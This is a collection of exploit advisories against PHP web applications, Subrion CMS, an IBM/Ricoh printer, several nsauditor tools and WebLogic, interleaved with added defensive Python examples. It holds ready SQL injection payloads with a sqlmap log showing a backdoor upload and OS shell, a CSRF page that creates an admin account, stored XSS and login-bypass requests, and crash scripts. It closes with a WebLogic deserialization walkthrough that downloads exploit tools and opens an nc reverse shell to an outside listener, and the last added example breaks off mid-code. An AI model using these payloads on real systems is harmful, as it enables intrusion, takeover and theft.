    Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---

================================
'mobilenumber' & 'emailid' & 'adminname' - SQLi
================================

---
Parameter: emailid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
---

---
Parameter: adminname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
---

---
Parameter: mobilenumber (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
---
-
Hostel Management System 2.0 - 'id' SQL Injection
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
# Google Dork: intitle: "Hostel management system"
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: v2.0
# Tested on: Windows
# CVE : N/A

Description:
The Hostel Management System v2.0 application from PHPgurukul is vulnerable to SQL injection via the 'id' parameter on the full-profile.php page.

====================
1. SQLi
====================

http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1

The ?id parameter is vulnerable to SQL injection; it was also tested, and an unauthenticated user has the full ability to run system commands via --os-shell and fully compromise the system.

GET parameter 'id' is vulnerable.
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-3444' OR 1650=1650#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=1' OR SLEEP(5)-- slKU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'john-pc\john'
os-shell>
-
Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-01-05
#Vendor Homepage : http://webcompanion.com/
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
#Tested on OS: Windows 10

#Analyze PoC :
==============

C:\Users\ZwX>sc qc WCAssistantService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
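A check for this class of finding, added here as an example and not part of the advisory: it parses `sc qc` output, decides whether the image path is unquoted and contains spaces, and lists the paths the service control manager would try before the real executable. The `sc qc` text below is the advisory's own output reproduced as a constructed string (the localized status line is dropped); the service and path names come from it.

```python
import re

# Constructed sample: the `sc qc WCAssistantService` output quoted above,
# minus the localized "[SC] QueryServiceConfig" status line.
SC_QC_OUTPUT = r"""
SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def image_path(binary_path):
    """The part of BINARY_PATH_NAME up to and including the executable name;
    anything after it is service arguments and does not matter here."""
    path = binary_path.strip()
    end = path.lower().find(".exe")
    return path if end == -1 else path[:end + 4]


def is_unquoted_with_spaces(binary_path):
    """True when the image path is not quoted and contains a space, i.e. the
    service control manager has to guess where the executable name ends."""
    path = binary_path.strip()
    return not path.startswith('"') and " " in image_path(path)


def hijack_candidates(binary_path):
    """Paths Windows tries, in order, before reaching the real image: the
    string is cut at every space and '.exe' appended. Any of these that an
    attacker can create runs as the service account on the next start."""
    image = image_path(binary_path)
    candidates = []
    idx = image.find(" ")
    while idx != -1:
        candidates.append(image[:idx] + ".exe")
        idx = image.find(" ", idx + 1)
    return candidates


def assess(sc_qc_output):
    """Combine the checks: returns (vulnerable, runs_as, candidate_paths)."""
    fields = parse_sc_qc(sc_qc_output)
    binpath = fields.get("BINARY_PATH_NAME", "")
    vulnerable = is_unquoted_with_spaces(binpath)
    return (vulnerable,
            fields.get("SERVICE_START_NAME", ""),
            hijack_candidates(binpath) if vulnerable else [])


if __name__ == "__main__":
    vuln, account, cands = assess(SC_QC_OUTPUT)
    print("unquoted path with spaces:", vuln, "| runs as:", account)
    for c in cands:
        print("  would be tried first:", c)
```

The candidate list is only half the story: the path is exploitable when a low-privileged user can write one of those files, which by default is not the case for `C:\` or `C:\Program Files\`. Check the ACLs of each candidate's directory (for example with `icacls "C:\Program Files\Lavasoft"`) before rating the service as a privilege escalation rather than a hardening finding.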
-
Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-01-05
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://intelliants.com/
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
# Software : Subrion CMS
# Product Version: v 4.0.5.10
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was discovered in version 4.0.5 of Subrion CMS.
# With this vulnerability, new privileged (admin) users can be added to the system.

HTML CSRF PoC :

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
        xhr.withCredentials = true;
        var body = "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"__st\"\r\n" +
          "\r\n" +
          "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"username\"\r\n" +
          "\r\n" +
          "ismailtasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
          "\r\n" +
          "Ismail Tasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"email\"\r\n" +
          "\r\n" +
          "test@mail.com\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"website\"\r\n" +
          "\r\n" +
          "https://ismailtasdelen.com\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"phone\"\r\n" +
          "\r\n" +
          "0000000000000000000\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"biography\"\r\n" +
          "\r\n" +
          "NULL\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"plan_id\"\r\n" +
          "\r\n" +
          "2\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:18:43\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:19\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"status\"\r\n" +
          "\r\n" +
          "active\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"save\"\r\n" +
          "\r\n" +
          "Add\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"goto\"\r\n" +
          "\r\n" +
          "list\r\n" +
          "-----------------------------9973334999367242361642875270--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
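The PoC above posts a fixed `__st` value, so the forgery only works if the server either ignores that field or accepts a value that is not tied to the victim's session. The following added example (not Subrion code; the `Request` class, the handler functions and the session layout are stand-ins) replays the PoC's request, cross-site `Origin` and static `__st` included, against a handler that trusts the cookie alone and against one that requires a per-session token and a matching `Origin`.

```python
import hmac
import secrets

SITE_ORIGIN = "https://SERVER"                   # placeholder host, as in the PoC above
STATIC_ST = "41209a5f43b0d7c8cef0e7ffcd9ce160"   # the fixed __st value the PoC sends


class Request:
    """Stand-in for an inbound POST: the Origin header the browser adds to
    cross-site XHRs, the decoded form fields, and the server-side session
    that the victim's cookies resolved to."""
    def __init__(self, origin, form, session):
        self.origin = origin
        self.form = form
        self.session = session


def issue_token(session):
    """Mint a per-session anti-CSRF token; the real admin form embeds it as __st."""
    session["__st"] = secrets.token_hex(16)
    return session["__st"]


def add_member_vulnerable(req, users):
    """Trusts the session cookie alone, so a forged cross-site POST that the
    browser sends with the admin's cookies is accepted like a legitimate one."""
    users[req.form["username"]] = int(req.form["usergroup_id"])
    return 200


def add_member_hardened(req, users):
    """Accepts only when __st matches the token bound to *this* session and
    the Origin header, when present, names our own site."""
    expected = req.session.get("__st")
    supplied = req.form.get("__st", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return 403
    users[req.form["username"]] = int(req.form["usergroup_id"])
    return 200


def simulate(handler):
    """Replay the PoC (attacker origin, static __st, usergroup_id=1) against a
    handler; returns (status, whether the account was created)."""
    users = {}
    admin_session = {"user": "admin"}
    issue_token(admin_session)   # the genuine form would have rendered this token
    forged = Request("https://attacker.example",
                     {"__st": STATIC_ST, "username": "ismailtasdelen", "usergroup_id": "1"},
                     admin_session)
    return handler(forged, users), "ismailtasdelen" in users


def simulate_legitimate():
    """The same hardened handler still accepts a same-origin post carrying
    the token it issued."""
    users = {}
    admin_session = {"user": "admin"}
    token = issue_token(admin_session)
    genuine = Request(SITE_ORIGIN,
                      {"__st": token, "username": "newadmin", "usergroup_id": "1"},
                      admin_session)
    return add_member_hardened(genuine, users), "newadmin" in users


if __name__ == "__main__":
    print("vulnerable handler:", simulate(add_member_vulnerable))
    print("hardened handler:  ", simulate(add_member_hardened))
    print("legitimate post:   ", simulate_legitimate())
```

Two details of the PoC explain why the Origin check matters: `multipart/form-data` is one of the content types a browser sends without a CORS preflight, and `withCredentials = true` asks it to attach the victim's cookies, so nothing stops the request from reaching the handler. Marking the session cookie `SameSite=Lax` or `Strict` is a further, independent layer against this exact request shape.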
-
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install NetworkSleuth
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. NetworkSleuth crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
# Date: 2020-01-02
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ibm.com/il-en
# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# CVE: N/A

# Description :
# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)

HTTP Request :

POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
Host: 134.84.35.70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
Origin: https://134.84.35.70
Connection: close
Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
Upgrade-Insecure-Requests: 1

0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=

HTTP Response :

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 269
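An added example, not the printer's firmware code, showing what the payload above does once the stored setting is reflected into a form field: the POST body is the one from the request above, the two rendering functions are stand-ins for the device's settings page (the attribute-reflection template is an assumption about where the value lands), and the tag count is a quick way to tell whether a stored value broke out of its attribute.

```python
import html
import re
from urllib.parse import parse_qs

# The POST body from the request above, copied verbatim.
POST_BODY = (
    "0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30"
    "&0.printer.4.258=1"
    "&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E"
    "&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0"
    "&0.network.10.73=120&1.printer.1.40="
)


def stored_value(body, name="1.network.6.10"):
    """Decode the form body and return the value the device would store for `name`."""
    return parse_qs(body, keep_blank_values=True)[name][0]


def render_unsafe(value):
    """Assumed template: the stored setting is reflected straight into an
    attribute, which lets a value starting with `">` close the attribute
    and the tag and start a new element."""
    return '<input type="text" name="1.network.6.10" value="%s">' % value


def render_safe(value):
    """Same template with the value HTML-escaped for attribute context."""
    return '<input type="text" name="1.network.6.10" value="%s">' % html.escape(value, quote=True)


def count_tags(markup):
    """Number of start tags in the markup."""
    return len(re.findall(r"<[A-Za-z][^>]*>", markup))


def breaks_out(value, renderer):
    """True when rendering `value` yields more start tags than rendering a
    harmless string: a cheap indicator that the value escaped its attribute."""
    return count_tags(renderer(value)) > count_tags(renderer("benign"))


if __name__ == "__main__":
    v = stored_value(POST_BODY)
    print("stored value     :", v)
    print("unsafe render    :", render_unsafe(v))
    print("breaks out       :", breaks_out(v, render_unsafe))
    print("safe render      :", render_safe(v))
    print("breaks out (safe):", breaks_out(v, render_safe))
```

Because the value is persisted in the device configuration, every administrator who later opens the general settings page executes it; that is what makes this stored rather than reflected XSS, and why the fix has to be output encoding at render time, not just input filtering on this one POST.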
-
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install SpotIE
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. SpotIE crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install ShareAlarmPro
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. ShareAlarmPro crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
elaniin CMS 1.0 - Authentication Bypass
# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2020-01-02
# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
# Software Link: https://github.com/elaniin/CMS/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description:
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/

# Vulnerability: An attacker can bypass the login page and gain access to the dashboard page.
# Vulnerable file: login.php
# Parameter & Payload: '=''or'

# Proof of Concept:

http://localhost/elaniin/login.php

POST /elaniin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 334
Referer: http://localhost/elaniin/login.php
Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
Connection: close
Upgrade-Insecure-Requests: 1

email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
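An added example, not code from either application, covering the two injection patterns on this page: the `id` lookup of the Hostel Management System advisory above and the login check of this elaniin advisory. Both apps run on MySQL; this demo uses SQLite so it runs offline, which forces two labelled substitutions: the Hostel `id` payload keeps its form but uses `-- ` instead of MySQL's `#` comment, and the login tautology is written as `' OR '1'='1` because the advisory's `'=''or'` depends on MySQL evaluating `0=''` as true, which SQLite does not. Table layout, sample rows and function names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the apps' MySQL tables
    (passwords kept in clear text only to keep the demo short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, name TEXT)")
    db.executemany("INSERT INTO users (email, password, name) VALUES (?, ?, ?)",
                   [("admin@example.test", "s3cret", "Admin"),
                    ("alice@example.test", "hunter2", "Alice")])
    return db


# --- full-profile.php?id=<value> --------------------------------------------
def full_profile_vulnerable(db, raw_id):
    """String-built WHERE clause: the `id` injection from the Hostel advisory."""
    sql = "SELECT name FROM users WHERE id='%s'" % raw_id
    return sorted(r[0] for r in db.execute(sql))


def full_profile_fixed(db, raw_id):
    """Allow-list the shape of the input, then bind it as a parameter."""
    if not raw_id.isdigit():
        return []
    return sorted(r[0] for r in db.execute("SELECT name FROM users WHERE id=?", (int(raw_id),)))


# --- login.php --------------------------------------------------------------
def login_vulnerable(db, email, password):
    """Both fields land in the SQL text, so a tautology in either one logs in."""
    sql = "SELECT name FROM users WHERE email='%s' AND password='%s'" % (email, password)
    return sorted(r[0] for r in db.execute(sql))


def login_fixed(db, email, password):
    """Bound parameters: the quote in the payload is data, never SQL."""
    return sorted(r[0] for r in db.execute(
        "SELECT name FROM users WHERE email=? AND password=?", (email, password)))


# The advisory's boolean-based `id` payload with `#` replaced by `-- ` for
# SQLite, and a plain tautology for login.php (see the lead-in for why the
# advisory's `'=''or'` form is MySQL-specific).
ID_PAYLOAD = "-3444' OR 1650=1650-- "
LOGIN_PAYLOAD = "' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("id=1              ->", full_profile_vulnerable(db, "1"))
    print("injected id       ->", full_profile_vulnerable(db, ID_PAYLOAD))
    print("fixed, injected   ->", full_profile_fixed(db, ID_PAYLOAD))
    print("login, injected   ->", login_vulnerable(db, LOGIN_PAYLOAD, LOGIN_PAYLOAD))
    print("fixed, injected   ->", login_fixed(db, LOGIN_PAYLOAD, LOGIN_PAYLOAD))
```

The `id` case is what lets sqlmap escalate to `--os-shell` in the Hostel write-up: once the WHERE clause is attacker-controlled, UNION and `INTO OUTFILE` style tricks follow. The login case shows why the `'=''or'` payload is interesting on MySQL specifically: `email=''=''or''` parses as `((email='')='')OR''`, and MySQL's lenient string-to-number comparison makes the middle term true for every row.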
-
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install BlueAuditor
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. BlueAuditor crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install Dnss
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. Dnss crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Title: Weblogic CVE-2018-3191 Remote Code Execution Vulnerability Reproduction
0x00 Introduction

On October 17 (Beijing time), a high-risk WebLogic remote code execution vulnerability (CVE-2018-3191) was fixed in Oracle's October Critical Patch Update (CPU). The vulnerability allows an unauthenticated attacker to reach and compromise a vulnerable WebLogic server over the network via the T3 protocol. A successful exploit lets the attacker take over the WebLogic server and execute code remotely.

0x01 Vulnerability reproduction

The target WebLogic server has the T3 service enabled and is deployed on Linux. A test environment can be brought up under Docker using https://github.com/vulhub/vulhub/tree/master/weblogic/cve-2018-262

1. Run the following commands on the JRMPListener host (a host on the public network, Ubuntu, IP address 149.28.*.85):

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

For example:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 149.28.*.

// Note that at present only the nc reverse shell command succeeds; a bash reverse shell gets mangled by escaping. The listener binds port 1099 locally, and the command it executes sends the nc reverse shell command to the WebLogic server.

2. At the same time, open another command window on the JRMPListener host and listen on the nc port:

nc -lvvp 5555

3. Run the script below on the local Windows attacker host:

weblogic-spring-jndi-12.2.1.3.jar for weblogic: 12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar for weblogic: 10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1

wget https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-10.3.6.0.jar
wget https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-12.2.1.3.jar
wget https://raw.githubusercontent.com/libraggbond/CVE-2018-3191/master/exploit.py

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

python exploit.py 66.42.

149.28.*.85 is the JRMPListener host, and the listening port on that host is 1099.

Finally, the reverse shell comes back:

0x02 Vulnerability fix

1. Oracle fixed the vulnerability in the October Critical Patch Update (CPU):
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

2. Disable the T3 protocol.

0x03 Reference links

https://mp.weixin.qq.com/s/ebkhjpbqcszay_vpocw0sg
https://github.com/libraggbond/CVE-2018-3191
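Before the JRMP listener is worth setting up, and after the "disable T3" fix is applied, the question is the same: does the port still speak T3, and which version does it announce? The check below is an added example and not part of the write-up or of exploit.py. It sends the T3 greeting, parses the `HELO:` answer, and maps the announced version to the helper jar the write-up pairs with it. The greeting and reply format are the ones the T3 handshake uses (the same opening line nmap's weblogic-t3-info probe sends); the sample replies are constructed, and the version in them is made up.

```python
import re
import socket

# T3 client greeting: "t3 <client version>\nAS:<max payload>\nHL:<header len>\n\n"
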